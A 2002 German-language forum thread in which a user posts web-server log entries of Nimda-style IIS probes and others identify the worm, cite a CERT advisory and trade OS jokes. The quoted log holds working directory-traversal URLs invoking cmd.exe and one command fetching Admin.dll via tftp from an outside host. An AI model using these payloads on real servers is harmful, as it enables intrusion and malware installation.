K@rl: neue IP ... und schon nach cmd.exe gescannt

So ist das im Leben - die neue IP Adresse ist erst ein paar Stunden alt .. und die ersten Besucher hinterlassen in access_log das untenstehende ...

Offensichtlich wird nach einer Sicherheitslücke auf NT Servern gesucht. Weiß jemand Genaueres was da abgeht?

Ciao   K@rl

213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:53 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" a-co26-76.tin.it - - [27/Feb/2002:17:52:44 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" a-co26-76.tin.it - - [27/Feb/2002:17:52:52 +0100] "GET /scripts/root.exe?/c+tftp%20-i%20213.45.145.50%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 - "-" "-"

  1. hi

    Offensichtlich wird nach einer Sicherheitslücke auf NT Servern gesucht. Weiß jemand Genaueres was da abgeht?

    das is Nimda und Anhang.. Wenn du was zum austesten von bösen Programmen brauchst - mit Sicherheit ist derjenige der da Scant selbst befallen oder ein Script-Kiddie (oder beides..)

    1. hi

      Offensichtlich wird nach einer Sicherheitslücke auf NT Servern gesucht. Weiß jemand Genaueres was da abgeht?

      das is Nimda und Anhang.. Wenn du was zum austesten von bösen Programmen brauchst - mit Sicherheit ist derjenige der da Scant selbst befallen oder ein Script-Kiddie (oder beides..)

      Ich glaube eher, Ihr seid hier alle von "bösen Programmen" beherrscht: M$$ (M$ $cientology) und "Anhang". Total "befallen". Noch vor kurzer Zeit wurden die vom Verfassungsschutz gejagt.

      W. Pichler

      1. hi

        Ich glaube eher, Ihr seid hier alle von "bösen Programmen" beherrscht: M$$ (M$ $cientology) und "Anhang". Total "befallen". Noch vor kurzer Zeit wurden die vom Verfassungsschutz gejagt.

        du machst mir Angst, sollte ich meine Microsoft-Maus doch besser wegwerfen..?

        <img src="/images/10.gif" width=224 height=119 border=0 alt="??!%${">

        p.s. bin Linux-User

  2. Hallo K@rl!

    Das hatten wir hier schon öfter ... um nicht zu sagen es stolpert schon über seinen Bart:

    http://www.cert.org/advisories/CA-2001-26.html

    (unter System FootPrint findest du das, was auch in deinem log steht)

    Gruss,
     Carsten

  3. Hi K@rl,

    Offensichtlich wird nach einer Sicherheitslücke auf NT Servern
    gesucht. Weiß jemand Genaueres was da abgeht?

    Nicht auf NT-Servern, sondern auf Maschinen mit einem Webserver,
    bei dem ein CGI-Verzeichnis '/scripts' existiert und zudem diverse
    Bugs und Installations-Standard-Eigenschaften vorliegen, welche
    alle zusammen ermöglichen, 'cmd.exe' via CGI auszuführen, damit der
    Besucher mit Hilfe von FTP oder Ähnlichem viele nette Freunde
    mitbringen und es sich bei Dir so richtig gemütlich machen kann.

    Aber solange Du keinen ungepatchten M$-IIS betreibst ...

    Viele Grüße
          Michael

    1. Hi Michael,

      Aber solange Du keinen ungepatchten M$-IIS betreibst ...

      M$-IIS - waddendad?
      der (angemietete) Server ist eine SGI (Silicon Graphics) unter Irix .. und natürlich mit Apache

      1. hi

        M$-IIS - waddendad?

        Microsoft Internet Intrusion Server

  4. So ist das im Leben - die neue IP Adresse ist erst ein paar Stunden alt .. und die ersten Besucher hinterlassen in access_log das untenstehende ...

    Offensichtlich wird nach einer Sicherheitslücke auf NT Servern gesucht. Weiß jemand Genaueres was da abgeht?

    Brauchen M$$ nicht zu wissen, was da abgeht.
    Das ist alles nur *natürlich* und gehört zu den Gepflogenheiten!
    Wenn ich jetzt sage, das soll so sein, werde ich hier unter den Win-Dummies, zerrissen. Aber was solls. Bißchen Provo muß sein.

    W. Pichler

    1. hi

      Wenn ich jetzt sage, das soll so sein, werde ich hier unter den Win-Dummies, zerrissen. Aber was solls. Bißchen Provo muß sein.

      meinst du hier ist eienr noch SO tierisch hinterm Mond, dass er (oder sie) Windos benutzt? *auch mal Provo will*

      1. Ach Kinners,

        meinst du hier ist eienr noch SO tierisch hinterm Mond, dass er (oder sie) Windos benutzt? *auch mal Provo will*

        macht Euch doch nichts vor:

        http://security.e-matters.de/advisories/012002.html

        <quote>Finally I want to mention that the boundary check vulnerabilities are only exploitable on linux or solaris</quote>

        Oh bugger....

        Das musste ich jetzt mal loswerden. Auf dass auch hier bald Heise-Flamewars herrschen. Weil's ja so furchtbar hilfreich ist. Und alle so gewaltig weiterbringt. Danke Schuer: </?m=32119&t=5752> Gut auf den Punkt gebracht.

        Koennen wir diese Schwachsinnsdiskussionen nicht ins Heise-Forum verlagern, wo sie hingehoeren? Und uns hier auf das besinnen wozu ich immer dachte dieses Forum da ist, naemlich Diskussionen um "HTML-Dateien selbst erstellen"?

        Nur mal so'n Gedanke...

        Gruss,
        Armin (in der Hoffnung dass ich es in Zukunft schaffe mich endgueltig aus diesen Diskussionen rauszuhalten)

        1. hi

          http://security.e-matters.de/advisories/012002.html

          <quote>Finally I want to mention that the boundary check vulnerabilities are only exploitable on linux or solaris</quote>

          ließ und zitiere bitte den kompletten Text. Wichtig ist noch, dass in der CVS-Version 4.2 alles weg ist (und nie da war) und dass der Patch auch schon raus ist.